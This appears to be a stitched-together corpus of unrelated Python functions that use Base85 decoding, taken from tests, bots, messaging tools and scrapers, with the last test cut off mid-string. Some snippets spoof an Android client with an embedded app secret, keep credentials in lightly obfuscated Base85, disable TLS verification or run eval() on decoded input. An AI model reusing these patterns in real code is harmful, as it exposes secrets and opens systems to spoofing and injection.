def fromjson(self, obj):
    """Hook for json.load(): rebuild tagged objects from plain dicts.

    Dicts carrying a 'clsname' key are turned back into instances:
    'bytes'/'bytearray' payloads are Base85-decoded from the 's' entry,
    any other class name is looked up in globals() or self.classes and
    instantiated with a no-arg constructor, then its __dict__ is filled
    from the remaining keys. Untagged dicts are returned unchanged.
    """
    if 'clsname' in obj:
        cls = obj['clsname']
        del obj['clsname']
        if cls in ("bytes", "bytearray"):
            import base64
            # Bugfix: the payload lives under the dict key 's' ('obj.s'
            # raised AttributeError), and 'bytesarray' was a typo for the
            # builtin bytearray.
            b = base64.b85decode(obj['s'].encode("ascii"))
            if cls == "bytearray":
                b = bytearray(b)
            return b
        elif cls in globals():
            constructor = globals()[cls]
        elif cls in self.classes:
            constructor = self.classes[cls]
        else:
            raise IKException(ErrorCode.objectNotExists, cls)
        try:
            instance = constructor()
        except Exception as e:
            print("Cannot instantiate class {0} : {1}".format(cls, e))
            s = input("Press any key...")
            sys.exit(-1)
        instance.__dict__ = obj
        return instance
    return obj
def test_b85decode(self): eq = self.assertEqual tests = { b'': b'', b'cXxL#aCvlSZ*DGca%T': b'www.python.org', b"""009C61O)~M2nh-c3=Iws5D^j+6crX17#SKH9337X""" b"""AR!_nBqb&%C@Cr{EG;fCFflSSG&MFiI5|2yJUu=?KtV!7L`6nNNJ&ad""" b"""OifNtP*GA-R8>}2SXo+ITwPvYU}0ioWMyV&XlZI|Y;A6DaB*^Tbai%j""" b"""czJqze0_d@fPsR8goTEOh>41ejE#<ukdcy;l$Dm3n3<ZJoSmMZprN9p""" b"""q@|{(sHv)}tgWuEu(7hUw6(UkxVgH!yuH4^z`?@9#Kp$P$jQpf%+1cv""" b"""(9zP<)YaD4*xB0K+}+;a;Njxq<mKk)=;`X~?CtLF@bU8V^!4`l`1$(#""" b"""{Qdp""": bytes(range(255)), b"""VPa!sWoBn+X=-b1ZEkOHadLBXb#`}nd3r%YLqtVJM@UIZOH55pPf$@(""" b"""Q&d$}S6EqEFflSSG&MFiI5{CeBQRbjDkv#CIy^osE+AW7dwl""": b"""abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ""" b"""0123456789!@#0^&*();:<>,. []{}""", b'Zf_uPVPs@!Zf7no': b'no padding..', b'dS!BNAY*TBaB^jHb7^mG00000': b'zero compression\x00\x00\x00\x00', b'dS!BNAY*TBaB^jHb7^mG0000': b'zero compression\x00\x00\x00', b"""LT`0$WMOi7IsgCw00""": b"""Boundary:\x00\x00\x00\x00""", b'Q*dEpWgug3ZE$irARr(h': b'Space compr: ', b'{{': b'\xff', b'|Nj': b'\xff'*2, b'|Ns9': b'\xff'*3, b'|NsC0': b'\xff'*4, } for data, res in tests.items(): eq(base64.b85decode(data), res) eq(base64.b85decode(data.decode("ascii")), res) self.check_other_types(base64.b85decode, b'cXxL#aCvlSZ*DGca%T', b"www.python.org")
def andro_mock(params):
    '''Simulate Android client

    Arguments: params

    Return value: request_string -> str
    '''
    import random
    import base64
    import collections

    # Fake hardware ID: 8 random bytes rendered as a hex string.
    fake_hw = random.Random().randrange(
        start=0, stop=18000000000000000084).to_bytes(8, 'big').hex()

    args = collections.OrderedDict({
        'platform': 'android',
        '_device': 'android',
        '_appver': '424000',
        '_p': '1',
        '_down': '0',
        'cid': params['cid'],
        '_tid': '0',
        'otype': 'json',
        '_hwid': fake_hw,
    })
    if params['quality'] is not None:
        args['quality'] = params['quality']

    # App key / secret are stored Base85-obfuscated.
    key_b85 = 'G&M40GdVRlW-v53V=yvd'
    sec_b85 = 'W;bIwGB##4G&y29Vr64yF=H|}HZ(LjH8?gmHeoU`'
    args['appkey'] = base64.b85decode(key_b85)

    # The signature is an MD5 over the *sorted* query string plus the
    # secret; the signed dict must not yet contain 'sign' itself.
    sorted_args = collections.OrderedDict(sorted(args.items()))
    to_sign = urllib.parse.urlencode(sorted_args) + \
        base64.b85decode(sec_b85).decode('utf-8')
    args['sign'] = hashlib.md5(to_sign.encode('utf-8')).hexdigest()

    # Returned in original insertion order with 'sign' appended last.
    return urllib.parse.urlencode(args)
def test_b85decode_errors(self): illegal = list(range(33)) + \ list(b'"\',./:[\\]') + \ list(range(128, 256)) for c in illegal: with self.assertRaises(ValueError, msg=bytes([c])): base64.b85decode(b'0000' + bytes([c])) self.assertRaises(ValueError, base64.b85decode, b'|') self.assertRaises(ValueError, base64.b85decode, b'|N') self.assertRaises(ValueError, base64.b85decode, b'|Ns') self.assertRaises(ValueError, base64.b85decode, b'|NsC') self.assertRaises(ValueError, base64.b85decode, b'|NsC1')
def generate_key_from_parts(x: str, y: str, d=None, in_bytes=False):
    """
    used to generate key from x and y sent over the internet
    :param x: x + y used for pubkey generation
    :param y:
    :param d: x+y+d used for private key genereation
    :param in_bytes: when True, x and y are Base85 text and the raw
        concatenated bytes are returned instead of an ECC object
    :return: pubkey object (or raw bytes when in_bytes is True)
    """
    if in_bytes:
        # Raw mode is only meaningful for public keys: just decode and join.
        decoded_x = base64.b85decode(x.encode())
        decoded_y = base64.b85decode(y.encode())
        return decoded_x + decoded_y
    # With d=None this builds a public key; with d set, a private key.
    return ECC.construct(curve="P-256", point_x=x, point_y=y, d=d)
def test_b85_padding(self): eq = self.assertEqual eq(base64.b85encode(b"x", pad=True), b'cmMzZ') eq(base64.b85encode(b"xx", pad=True), b'cz6H+') eq(base64.b85encode(b"xxx", pad=True), b'czAdK') eq(base64.b85encode(b"xxxx", pad=True), b'czAet') eq(base64.b85encode(b"xxxxx", pad=True), b'czAetcmMzZ') eq(base64.b85decode(b'cmMzZ'), b"x\x00\x00\x00") eq(base64.b85decode(b'cz6H+'), b"xx\x00\x00") eq(base64.b85decode(b'czAdK'), b"xxx\x00") eq(base64.b85decode(b'czAet'), b"xxxx") eq(base64.b85decode(b'czAetcmMzZ'), b"xxxxx\x00\x00\x00")
def load(cls, d):
    """Build a Config from a parsed config dict `d`.

    Reads the 'debug' flag and the Base85-obfuscated JD credentials;
    a missing/garbled credentials section is logged and left unset.
    """
    the_config = Config()
    the_config.debug = d.get('debug', False)
    try:
        jd_section = d['jd']
        the_config.jd = {
            'username': b85decode(jd_section['username']).decode(),
            'password': b85decode(jd_section['password']).decode(),
        }
    except Exception as e:
        logging.error('获取京东帐号配置出错: ' + repr(e))
    return the_config
def andro_mock(tls, params):
    '''Simulate Android client

    Arguments: params

    Return value: request_string -> str
    '''
    import random
    import base64
    import collections
    our_lvl = 412
    url_andr3 = 'http://app.bilibili.com/mdata/android3/android3.ver'
    if tls == True:
        url_andr3 = tlsify(url_andr3)
    # Probe the server's current API level and warn if we are behind.
    _, api_response = fetch_url(url_andr3, user_agent=USER_AGENT_API)
    api_lvl = int(json.loads(api_response.decode('utf-8'))['upgrade']['ver'])
    logging.debug('Our simulated API level: %s, latest API level: %s' %
                  (our_lvl, api_lvl))
    if api_lvl > our_lvl:
        logging.warning(
            'Bilibili API server indicates the API protocol has been updated, the extraction may not work!'
        )
    # Bugfix: '.hex()' had been commented out, so '_hwid' was raw bytes and
    # urlencode() rendered it as a "b'...'" repr. The sibling implementations
    # send a hex string, so restore the hex encoding.
    fake_hw = random.Random().randrange(
        start=0, stop=18000000000000000084).to_bytes(8, 'big').hex()
    add_req_args = collections.OrderedDict({
        'platform': 'android',
        '_device': 'android',
        '_appver': '424000',
        '_p': '1',
        '_down': '0',
        'cid': params['cid'],
        '_tid': '0',
        'otype': 'json',
        '_hwid': fake_hw
    })
    if params['quality'] is not None:
        add_req_args['quality'] = params['quality']
    # App key / secret are stored Base85-obfuscated.
    second_key = 'G&M40GdVRlW-v53V=yvd'
    second_sec = 'W;bIwGB##4G&y29Vr64yF=H|}HZ(LjH8?gmHeoU`'
    add_req_args['appkey'] = base64.b85decode(second_key)
    # Sign the *sorted* query string plus the secret; the returned query
    # keeps the original insertion order with 'sign' appended last.
    req_args = add_req_args
    add_req_args = collections.OrderedDict(sorted(req_args.items()))
    req_args['sign'] = hashlib.md5(
        bytes(
            urllib.parse.urlencode(add_req_args) +
            base64.b85decode(second_sec).decode('utf-8'),
            'utf-8')).hexdigest()
    return urllib.parse.urlencode(req_args)
def fuzz(filename):
    """Feed the file's bytes to every base64-family decoder (tolerating the
    documented decode errors), then assert all encode/decode round-trips."""
    with open(filename, "rb") as fp:
        data = fp.read()

    # (decoder, exception the decoder may legitimately raise on junk input)
    decoders = (
        (base64.b64decode, base64.binascii.Error),
        (base64.standard_b64decode, base64.binascii.Error),
        (base64.urlsafe_b64decode, base64.binascii.Error),
        (base64.b32decode, base64.binascii.Error),
        (base64.b16decode, base64.binascii.Error),
        (base64.a85decode, ValueError),  # TODO undocumented exception.
        (lambda d: base64.a85decode(d, adobe=True), ValueError),  # TODO undocumented exception.
        (base64.b85decode, ValueError),  # TODO undocumented exception.
    )
    for decode, expected_error in decoders:
        try:
            decode(data)
        except expected_error:
            pass

    # Every codec must round-trip arbitrary bytes exactly.
    assert data == base64.b64decode(base64.b64encode(data))
    assert data == base64.standard_b64decode(base64.standard_b64encode(data))
    assert data == base64.urlsafe_b64decode(base64.urlsafe_b64encode(data))
    assert data == base64.b32decode(base64.b32encode(data))
    assert data == base64.b16decode(base64.b16encode(data))
    assert data == base64.a85decode(base64.a85encode(data))
    assert data == base64.a85decode(
        base64.a85encode(data, adobe=True), adobe=True)
    assert data == base64.b85decode(base64.b85encode(data))
def sendFirebase(event):
    """Upload the event's Base85-encoded image to Firebase storage and push
    a timestamped record (with the image URL) into the users collection."""
    db, stor = startFirebase()

    ## Date
    today = date.today()
    ## Textual month, day and year (currently unused downstream)
    dateToday = today.strftime("%B %d, %Y")
    now = datetime.now()
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")

    ## Unique file name for the uploaded image
    unique_name = str(uuid.uuid1())
    imagePath = unique_name + ".jpg"
    print(imagePath)

    # The image travels Base85-encoded inside the event payload.
    image = BytesIO(base64.b85decode(event['image_bytes']))
    stor.child(imagePath).put(image)

    ## Resolve the public URL of the stored image
    imageURL = stor.child(imagePath).get_url(None)

    data = {
        "Timestamp": dt_string,
        "Location": 'Lot 9181',
        "ImageURL": imageURL
    }
    print("data uploaded!")
    db.child("users").push(data)
    return data
def __parse(line):
    """Extract one training example from an SGF line via the native parser.

    Returns (features, boost, value, policy); on parser failure all four
    are zero arrays of the expected shapes.
    """
    example = ffi.new("Example[]", 1)
    result = dream_go.extract_single_example(line, example)

    if result != 0:
        # Parser rejected the line: emit empty tensors of the right shape.
        features = np.zeros((19, 19, NUM_FEATURES), 'f2')
        boost = np.zeros((), 'f4')
        value = np.zeros((), 'f4')
        policy = np.zeros((362, ), 'f2')
    else:
        features_hat = ffi.buffer(example[0].features,
                                  11552 * ffi.sizeof('float'))
        policy_hat = ffi.string(example[0].policy)

        features = np.frombuffer(features_hat, 'f4').astype('f2')
        value = np.asarray(
            1.0 if example[0].color == example[0].winner else -1.0, 'f4')
        # Bugfix: np.fromstring is deprecated (removed in newer NumPy) and
        # b85decode already yields bytes — use np.frombuffer.
        policy = np.frombuffer(base64.b85decode(policy_hat), 'f2')

        if example[0].number <= len(BOOST_PER_MOVE_NUMBER):
            boost = np.asarray(
                BOOST_PER_MOVE_NUMBER[example[0].number - 1], 'f4')
        else:
            boost = np.asarray(1.0, 'f4')

        # fix any partial policy
        policy[example[0].index] += 1.0 - np.sum(policy)

    return features, boost, value, policy
def b85decode(payload):
    """
    Decode payload - must be ascii text.
    """
    # Base85 decoding only exists in the Python 3 stdlib.
    if PY2:
        raise NotImplementedError("Python 2 can't decode base85-encoded data.")
    return base64.b85decode(payload)
def decode(m):
    """Try hex, base32, base64 then base85 decodings of `m`.

    Returns a list holding the first candidate decoding that passes
    check_valid() (the base85 fallback is accepted unchecked); the list is
    empty when nothing decodes.
    """
    res = []
    try:
        val = bytes.fromhex(m.decode())
        if not check_valid(val):
            raise ValueError
        res.append(val)
    except ValueError:
        try:
            val = b32decode(m)
            if not check_valid(val):
                raise ValueError
            res.append(val)
        except (binascii.Error, ValueError):
            try:
                val = b64decode(m)
                if not check_valid(val):
                    raise ValueError
                res.append(val)
            except (binascii.Error, ValueError):
                try:
                    val = b85decode(m)
                    res.append(val)
                # Bugfix: b85decode raises a plain ValueError on invalid
                # input, which `except binascii.Error` did not catch and so
                # escaped the fallback chain. ValueError covers both
                # (binascii.Error subclasses ValueError).
                except ValueError:
                    pass
    return res
async def decode_base85(self, ctx, *, input: str):
    """ Decode base85 """
    try:
        # b85decode raises ValueError on malformed input; any failure in
        # decoding or sending the result falls through to the error reply.
        decoded = base64.b85decode(input.encode('UTF-8'))
        await self.encryptout(ctx, "base85 -> Text", decoded)
    except Exception:
        await ctx.send("Invalid base85...")
def decompress_command_output(command_output: str) -> str:
    """ Decompress command output """
    from base64 import b85decode
    from bz2 import decompress

    # The payload is bz2-compressed then Base85-encoded; reverse both
    # steps and interpret the result as UTF-8 text.
    compressed = b85decode(command_output)
    return str(decompress(compressed), "utf-8")
def decode(self, payload, **kwargs):
    """
    Base85 decode content from provided payload

    :param bytes payload: Payload to be decoded
    :param **kwargs kwargs: Additional attributes (unused)

    :returns: Base85 decoded content
    :rtype: list of tuples
    """
    try:
        content = base64.b85decode(payload)
        # Metadata currently records only the decoded size.
        meta = {'size': len(content)}
        return [(meta, content)]
    except Exception as err:
        self.log.error("Unable to Base85 decode payload: {}".format(str(err)))
        return None
def proxy_sdns_query(self):
    """Forward the client's raw DNS query to the SDNS server over TLS and
    relay the decoded answer back to the client socket."""
    req_bin, client_sock = self.request
    sdns_req = {
        "request_id": 1,
        # Raw DNS bytes travel Base85-encoded inside the JSON envelope.
        "query": base64.b85encode(req_bin).decode("ascii"),
        "username": "******",
        "auth_token": "testtoken"
    }

    # TODO: using a new connection for each request; this is expensive...
    # TODO: real implementation would require certificate validation
    ssl_context = ssl.create_default_context()
    ssl_context.check_hostname = False
    ssl_context.verify_mode = ssl.CERT_NONE

    with ssl_context.wrap_socket(socket(AF_INET, SOCK_STREAM)) as sdns_sock:
        sdns_sock.connect((SDNS_HOST, SDNS_PORT))
        # Append trailing newline to indicate the end of the request
        payload = bytes(json.dumps(sdns_req) + "\n", "ascii")
        print("Sending SDNS request: '{}'".format(payload))
        sdns_sock.sendall(payload)
        sdns_resp = str(sdns_sock.recv(4096), "ascii")

    print("Got SDNS response:")
    print(str(sdns_resp))
    try:
        parsed = json.loads(sdns_resp)
        ok = ('status' in parsed and parsed['status'] == 0
              and 'response' in parsed)
        if not ok:
            print("SDNS request failed")
        else:
            client_sock.sendto(base64.b85decode(parsed['response']),
                               self.client_address)
    except json.JSONDecodeError as e:
        print("Error: JSON decode failed", e)
def base85_decode(text):
    """Base85-decode `text` and return the result as UTF-8 text.

    Returns the fixed error string on malformed Base85 input or when the
    decoded bytes are not valid UTF-8.
    """
    try:
        raw = bytes(text, 'utf-8')
        return base64.b85decode(raw).decode()
    # Bugfix: was a bare `except`, which swallowed every exception
    # (including KeyboardInterrupt). Only decoding failures are expected:
    # b85decode raises ValueError, .decode() raises UnicodeDecodeError.
    except (ValueError, UnicodeDecodeError):
        return "解码错误"
def main():
    """Load data.json, show its 'bytes' field before/after base64 decoding,
    hand it to manipulate(), then run two fixed decoder sanity checks."""
    print("importing data....")
    try:
        data = json.load(open('data.json'))
        pprint(data)  # printing the data
        bytesInformation = data["bytes"]  # reading out the values
        print("\nBefore Conversion: {}".format(bytesInformation))
        # now we need to convert from base64 to human readable language
        convertedBase64 = base64.b64decode(bytesInformation)
        print("After Conversion: {}".format(convertedBase64))
        print("Secondary Conversion Test: {}".format(
            convertedBase64.decode("utf-8")))
        # calling manipulate, which will convert into the following way
        manipulate(bytesInformation)
    except:
        print("Error, data not loaded properly")

    # this is an experiment, to make sure the conversion is working properly
    print("\nExperiment: {} ".format(
        base64.b64decode(
            "TWFuIGlzIGRpc3Rpbmd1aXNoZWQsIG5vdCBvbmx5IGJ5IGhpcyByZWFzb24sIGJ1dCAuLi4="
        )))
    print("ExperimentV2: {}".format(
        base64.b85decode("uz6hiDLQ0eCLKwAA9C5uQiUVvDscizBAQDCLHDu8FSU=")))
def handleCAPs(packet):
    """IRC CAP negotiation: request supported caps on 'LS', finish (and do
    SASL PLAIN auth if granted) on 'ACK'. Returns True when handled."""
    if not CAPs['actuallyUseThisCrap']:
        return False
    if __main__.database['globals']['debug']:
        print("Handling CAP: " + str(packet))

    if " LS :" in packet['rest']:
        # Server advertised its capabilities — request the intersection
        # with the ones we implement.
        CAPs['server'] = packet['rest'].partition(" LS :")[2].split()
        for cap in CAPs['server']:
            if cap in CAPs['client']:
                CAPs['enabled'].append(cap)
        if CAPs['enabled']:
            __main__.sendPacket(__main__.makePacket(
                "CAP REQ :" + " ".join(CAPs['enabled'])))
        return True

    elif " ACK :" in packet['rest']:
        CAPs['enabled'] = packet['rest'].partition(" ACK :")[2].split()
        if "sasl" in CAPs['enabled']:
            # SASL PLAIN: "AUTHENTICATE PLAIN", then base64(nick\0nick\0pw).
            __main__.sendPacket(__main__.makePacket("AUTHENTICATE PLAIN"))
            data = __main__.sock.recv(512).decode(errors="ignore")
            settings = __main__.database['api']['ircsettings']
            # The stored password is Base85-obfuscated.
            pw = base64.b85decode(settings['pw']).decode("utf-8")
            creds = '\0'.join((settings['nick'], settings['nick'], pw))
            __main__.sendPacket(__main__.makePacket(
                "AUTHENTICATE" + " " +
                base64.b64encode(creds.encode("utf-8")).decode("utf-8")))
            data = __main__.sock.recv(2048).decode(errors="ignore")
        __main__.sendPacket(__main__.makePacket("CAP END"))
        __main__.loggedIn = True
        return True

    return False
def decode(string, key):
    """Reverse of the matching encoder: Base85-decode `string` into
    space-separated hex bytes, then XOR bit-by-bit with a repeated `key`
    (via Cipher.xor) to recover the plaintext."""
    cipher_hex = base64.b85decode(
        string.encode("utf-8")).decode("utf-8").split(" ")
    cipher_ints = [int(h, base=16) for h in cipher_hex]
    cipher_octets = [format(v, 'b').rjust(8).replace(" ", "0")
                     for v in cipher_ints]
    keyOctets = [format(v, 'b').rjust(8).replace(" ", "0")
                 for v in [ord(c) for c in key]]

    # Repeat the key until it covers the ciphertext.
    # NOTE(review): the inner `for` iterates a snapshot of keyOctets while
    # the name is rebound — kept verbatim to preserve the exact extension
    # order the encoder expects.
    while len(keyOctets) < len(cipher_octets):
        for octet in keyOctets:
            if len(keyOctets) > len(cipher_octets):
                break
            keyOctets = keyOctets + [octet]

    plain_octets = [
        "".join(["1" if Cipher.xor(bit, keyOctets[i][j]) else "0"
                 for j, bit in enumerate(octet)])
        for i, octet in enumerate(cipher_octets)
    ]
    plain_chars = [chr(int(bits, base=2)) for bits in plain_octets]
    return "".join(plain_chars)
def process_file_key_message(
        assembled:    bytes,           # File decryption key
        onion_pub_key: bytes,          # Onion address of associated contact
        origin:        bytes,          # Origin of file key packet (user / contact)
        contact_list: 'ContactList',   # ContactList object
        file_keys:    Dict[bytes, bytes]  # Dictionary of file identifiers and decryption keys
) -> str:
    """Process received file key delivery message.

    Stores the delivered key under (contact pubkey + ciphertext hash) and
    returns the sending contact's nick.
    """
    # Users don't deliver file keys to themselves.
    if origin == ORIGIN_USER_HEADER:
        raise FunctionReturn("File key message from the user.", output=False)

    try:
        decoded = base64.b85decode(assembled)
    except ValueError:
        raise FunctionReturn("Error: Received an invalid file key message.")

    ct_hash, file_key = separate_header(decoded, BLAKE2_DIGEST_LENGTH)

    # Both halves must be exactly the expected length.
    if (len(ct_hash) != BLAKE2_DIGEST_LENGTH
            or len(file_key) != SYMMETRIC_KEY_LENGTH):
        raise FunctionReturn("Error: Received an invalid file key message.")

    file_keys[onion_pub_key + ct_hash] = file_key

    return contact_list.get_contact_by_pub_key(onion_pub_key).nick
def main():
    """Serve a Dash scatter plot of the embedded point cloud so users can
    visually confirm their installation works."""
    app = dash.Dash()
    my_css_url = 'https://codepen.io/chriddyp/pen/bWLwgP.css'
    app.css.append_css({"external_url": my_css_url})

    # POINTS is a Base85-encoded, gzip-compressed .npy array of (x, y) pairs.
    points = np.load(io.BytesIO(gzip.decompress(base64.b85decode(POINTS))))
    scatter = go.Scatter(x=points[:, 0], y=points[:, 1], mode='markers')

    layout = dict(width=1000,
                  height=1000,
                  xaxis=dict(title='', zeroline=False, showgrid=False),
                  yaxis=dict(title='', zeroline=False, showgrid=False),
                  hovermode='closest')
    fig = dict(data=[scatter], layout=layout)

    app.layout = html.Div(children=[
        dcc.Markdown('''# Kontrola instalace

Pokud body vytvářejí smysluplné slovo, instalace proběhla uspěšně!
Gratulujeme!'''),
        dcc.Graph(figure=fig)
    ],
                          style={'textAlign': 'center'})

    app.run_server()
def unprep(x):
    """
    Helper function to deserialize a Python object.
    """
    # When storage is compressed and/or encrypted, payloads are additionally
    # Base85-wrapped; undo that wrapper first.
    if COMPRESS or (ENCRYPT_KEY is not None):
        x = base64.b85decode(x)
    # literal_eval (rather than eval) keeps deserialization restricted to
    # Python literals.
    return literal_eval(decompress_decrypt(x).decode("utf8"))
def unpackTree(data, dest):
    """Unpack a Base85-encoded .tar.xz blob into directory `dest`.

    Raises BuildError on any unpack failure.
    """
    try:
        f = io.BytesIO(base64.b85decode(data))
        with tarfile.open(fileobj=f, mode="r:xz") as tar:
            # NOTE(review): extractall() on untrusted archives can write
            # outside `dest` (path traversal) — callers must trust `data`.
            tar.extractall(dest)
    # Bugfix: corrupt Base85 input raises ValueError and a malformed
    # archive raises tarfile.TarError; previously only OSError was caught,
    # so those escaped instead of becoming a BuildError.
    except (OSError, tarfile.TarError, ValueError) as e:
        raise BuildError("Error unpacking files: {}".format(str(e)))
def read_transport(self, n, timeout_sec):
    """RPC wrapper: ask the remote side for up to `n` transport bytes and
    return its reply with the 'data' field decoded from Base85."""
    request = {"n": n, "timeout_sec": timeout_sec}
    reply = self._request_reply("read_transport", request)
    # The wire protocol carries binary data as Base85 text.
    reply["data"] = base64.b85decode(reply["data"])
    return reply
def verify_HMAC(self, supplied_hmac, data: bytes, key: int = None):
    """Compare a supplied (Base85-encoded) HMAC against a freshly generated
    one over `data`, using a constant-time comparison."""
    if key is None:
        gen_hmac = self.generate_HMAC(data)
    else:
        gen_hmac = self.generate_HMAC(data, key)
    # compare_digest avoids timing side channels.
    return hmac.compare_digest(gen_hmac, base64.b85decode(supplied_hmac))
def detect_errors(self, packet: bytes) -> bytes:
    """Handle received packet error detection and/or correction."""
    # Qubes transport wraps packets in Base85; unwrap before any check.
    if self.settings.qubes:
        try:
            packet = base64.b85decode(packet)
        except ValueError:
            raise SoftError("Error: Received packet had invalid Base85 encoding.")

    use_rs = (self.settings.session_serial_error_correction
              and not self.settings.qubes)
    if use_rs:
        # Serial links use Reed-Solomon forward error correction.
        try:
            packet, _ = self.rs.decode(packet)
            return bytes(packet)
        except ReedSolomonError:
            raise SoftError(
                "Error: Reed-Solomon failed to correct errors in the received packet.",
                bold=True)

    # Otherwise the packet carries a trailing BLAKE2b checksum.
    packet, checksum = separate_trailer(packet, PACKET_CHECKSUM_LENGTH)
    computed = hashlib.blake2b(packet,
                               digest_size=PACKET_CHECKSUM_LENGTH).digest()
    if computed != checksum:
        raise SoftError("Warning! Received packet had an invalid checksum.",
                        bold=True)
    return packet
def rec2(xx):
    """Render parametric curves packed in `xx` (Base85 + bz2 text) to
    2.png, then run letters_extract2 with a label typed by the user."""
    x = []
    y = []
    # Each line (after the first) holds "x(t);y(t)" expressions wrapped in
    # braces with '^' for exponentiation.
    lines = bz2.decompress(
        base64.b85decode(xx)).decode("utf-8").strip().split('\n')[1:]
    lines = [ln[8:-1] for ln in lines]
    curves = [
        [
            ln.split(';')[0].replace('{', '').replace('}', '').replace('^', '**'),
            ln.split(';')[1].replace('{', '').replace('}', '').replace('^', '**'),
        ]
        for ln in lines
    ]

    values = []
    # Sample every curve at t in [0, 1) with step 0.01.
    # NOTE(review): eval() on decoded payload — only safe for trusted input.
    st = 0
    while st < 1:
        for expr_x, expr_y in curves:
            x.append(eval(expr_x.replace('t', str(st))))
            y.append(eval(expr_y.replace('t', str(st))) * (-1))
        st += 0.01

    fig, ax = plt.subplots()
    plt.axis('off')
    ax.scatter(x, y, s=50, color="black")
    fig.set_size_inches((max(x) - min(x)) / 10, 4.8)
    fig.savefig("2.png")
    plt.show()
    sss = input()
    letters_extract2("2.png", sss)
    return sss
def test_real_world_01(self):
    """Decode a captured .NET BinaryFormatter payload (zlib + Base85) and
    verify the parsed records describe a System.Drawing.Bitmap whose data
    member starts with a PNG signature."""
    unit = self.load(encoder='hex')
    blob = base64.b85decode(
        'c-muNWME+U4+J0@1bCQ$L||}baY<^fo=Z_;d1hX^jzU;!QE_H|o~@Cd0SM|SIG5&>loqAh=B1XF6eZ^9C<K%y<zyy%r&fmKXQ$@b'
        'CK(u~nWmYi85*XT8YCJgvVzPPMKxB>DYGOuu>d5);*waB$j$_^o0Azx@Pi0$AeX5#z|WnRONtA~=k@e(2?EjrAk4uAB;`N<PXy^s'
        'cl32+VA$Bt{U?zX$X7`A2=ZlMs8VBKXlP+z_yrVdc)`F>YQVtoDuIE)Y6b&?c)^@qfi?^bjMF?_978PpmtMZB?OZ5x{NsE1gRL>0'
        'DwCE^s-FIjanf>?^D1rj2iCR<IGsI_T)fS=M|6^KwSc(x<ZDOF(heKE$=fGyCd)6rJZ8_Yb@%Ju-~T!HmWEXCKW@=4Gq@wU)9Sv9'
        'X)5M#xNu7SreWkxr+D6{E6utiez)9Q`mtRpOm%}eZ`7%`MvhN?HIjC6?3pq3K%7a2=JI0ZRki&2?0WS#mau$V<mi1<HannLvS#YJ'
        'n)9!V`c}I?{P4$b_v0P1#&cu%rTS~KHtc-&{NjS8Ysv((?rztwmgy*X!}oHV>_5-FXRQ??_P+9$`<m5LA~wgld79B}o`CW?;d{3G'
        'I5>Zwdmz((*s43d!<_$Qy3G4X2cUcu%L@CicDbKJw>F)%KIPvs(Y~fe-Lly`<3do?WIn04>wfd@d&Xj)JLkE1MECk+uX7E2yis0j'
        '<Ckq|o0?Xq&ph8w*I4xPYvcP4{cO5Rujq<x-gj^2;z+wA63YK(6e)qcb29W+-5(vpnO+Omw+WqI<|X8%?rtzy%VbH*o}ZufSH(=Z'
        '$GG}%TSn6%(Qlw6>FMg{vd$@?i5mc8JO-@')
    data = json.loads(unit(zlib.decompress(blob)))

    self.assertEqual(len(data), 3)
    self.assertEqual(
        data[1]['Data']['LibraryName'],
        'System.Drawing, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'
    )
    self.assertEqual(data[2]['Data']['ClassInfo']['ClassName'],
                     'System.Drawing.Bitmap')
    self.assertEqual(
        bytes.fromhex(data[2]['Data']['Members']['Data'])[:6],
        b'\x89PNG\r\n')
def read_qubes_buffer_file(buffer_file_dir: str = '') -> bytes:
    """Read packet from oldest buffer file."""
    buffer_file_dir = buffer_file_dir or BUFFER_FILE_DIR
    ensure_dir(f"{buffer_file_dir}/")

    # Block until at least one buffer file appears.
    while not any(f.startswith(BUFFER_FILE_NAME)
                  for f in os.listdir(buffer_file_dir)):
        time.sleep(0.001)

    # Buffer files are named "<BUFFER_FILE_NAME>.<number>"; order by number.
    prefix_len = len(BUFFER_FILE_NAME) + len('.')
    suffixes = [f[prefix_len:] for f in os.listdir(buffer_file_dir)
                if f.startswith(BUFFER_FILE_NAME)]
    numeric = [s for s in suffixes if s.isdigit()]
    ordered = [f"{BUFFER_FILE_NAME}.{n}" for n in sorted(numeric, key=int)]

    try:
        oldest_buffer_file = ordered[0]
    except IndexError:
        raise SoftError("No packet was available.", output=False)

    path = f"{buffer_file_dir}/{oldest_buffer_file}"
    with open(path, 'rb') as f:
        packet = f.read()

    try:
        packet = base64.b85decode(packet)
    except ValueError:
        raise SoftError("Error: Received packet had invalid Base85 encoding.")

    # Only consume (delete) the file once it decoded cleanly.
    os.remove(path)

    return packet
def test_real_world_02(self):
    """Decode a second captured BinaryFormatter payload and verify both the
    record-type sequence and selected members of the final class record."""
    unit = self.load()
    blob = base64.b85decode(
        'c-pN~-EP`Q6gEvrK)b76wAx**S}96;(TjjE7#k$Ak{KKbxG@3a2&a+Pj3>eNF#a18!>UprU>~B-*_&NYlbcPl7c2EhKF8y4zVmOc'
        'z;WE)xiHJ*#}~O$W}#zKG)3{+h3NReKyl&*<fKvMTh)5Cc6<O*Ow$;h5R}r`#>WTabb(zsLK{8s5ji0##=Fet=fZT8P_(Lo0AmDc'
        '?k1`B5kavFtE!vOKlrPwe}$`l2%Hq>QNK$P*Vj9F7JHVP=a3Yw#NDEjwZ3<?%W*$H7y9a&HK9~0Gb$_M%U=a<pB=uPcG>g#IU=K#'
        '8T`{uk(p;N?dQO&&ROqw-?F+k^j&g$>LTp?(&?te!RYb#x19+}s2x)fq=Y_3-*iB*TG_-=UGjwbYiE)Yjld_sZ;TaUM3M6}oR-os'
        'r79w~bom&~i)Sq;KdS6L^KV@%6iUoC9`>nR%+*Uag1uaQeR25i&+hEJrz*X($)}H=y|$|;Lx%^IAdBo=;+ZYlX3JHUp|{>R8(A|3'
        '{B%MxVas1?5cK%2uUllOMO(Sv?+s(~(({!u9E``oN>hSi=wom04O1u7jqJiY8;Hg*nF+IzwbYV1CKO197*P$+1whBQ2+Rn-@Zzju'
        '0%fHrLD!txY6LU55L=gSI*_A_(e|`EH^J@NowXB7ahjFhB8vuXaYHbydr0B+@p?Gyn^pz(hv!S)^Nh*VQ{vN6+HZ+s1h$nJ${#!p'
        'EChi7b88U&F53icxpJ=R7qU4vYAwF&iOo1RK`MiWD>aoY7)<b3wFkV{3kLW?U$zvD4;sF2jOw}&Eomi@<gg)$?MO*tw6sD+b?4{K'
